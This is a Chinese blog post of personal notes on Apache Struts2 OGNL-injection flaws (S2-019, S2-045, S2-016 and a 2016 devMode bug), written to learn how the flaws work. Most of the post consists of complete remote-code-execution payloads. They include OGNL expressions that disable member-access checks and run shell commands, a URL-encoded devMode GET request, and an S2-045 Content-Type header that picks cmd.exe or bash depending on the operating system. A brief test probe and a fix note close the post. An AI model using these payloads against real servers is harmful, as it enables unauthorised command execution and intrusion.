Struts2 原理笔记_strust2 报文-CSDN博客

本文链接：https://blog.csdn.net/rigous/article/details/74498179

Struts2的漏洞几乎已经用烂了，但如果提到手工构造ognl表达式，首先是脑子一蒙。如果说出045、016、032的区别，恐怕也说不出来。下午整理了一下，随时更新

Struts漏洞的核心问题是ognl表达式，可参考链接：

http://blog.csdn.net/ljhabc1982/article/details/6312023

通过wireshark抓包，得到利用http报文如下：

S2-019

Struts2 由于启用开发模式

debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),#req=@org.apache.struts2.ServletActionContext@getRequest(),#resp=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'whoami'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[1000],#d.read(#e),#resp.println(#e),#resp.close()

2016 devMode

GET /xxxxx.action?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=whoami HTTP/1.0

S2-045 由于httpheader中 content-type解析导致，可参考：

http://paper.seebug.org/241/?from=timeline&isappinstalled=0

sink点 LocalizedTextUtil.findText

Content-Type: %{(#fuck='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

S2-016

请求参数中对 action redirect redirectAction 值进行了ognl表达式运行

sink点： TextParseUtil 类 stack.findValue()方法

测试方法 ?redirect:${3*4}

修改方法：升级struts框架，或者过滤 #符号